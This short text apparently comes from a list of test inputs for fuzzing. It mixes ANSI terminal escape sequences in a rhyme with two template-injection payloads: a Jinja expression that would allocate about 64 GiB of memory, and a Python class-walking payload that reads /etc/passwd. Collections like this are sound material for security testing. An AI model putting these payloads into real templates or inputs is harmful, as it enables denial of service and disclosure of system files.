[0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue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But now...[20Cfor my greatest trick...[8m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 quick brown fox... [Beeeep]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{% print ‘x’ * 64 * 1024**3 %}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{{ “".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd”).read() }}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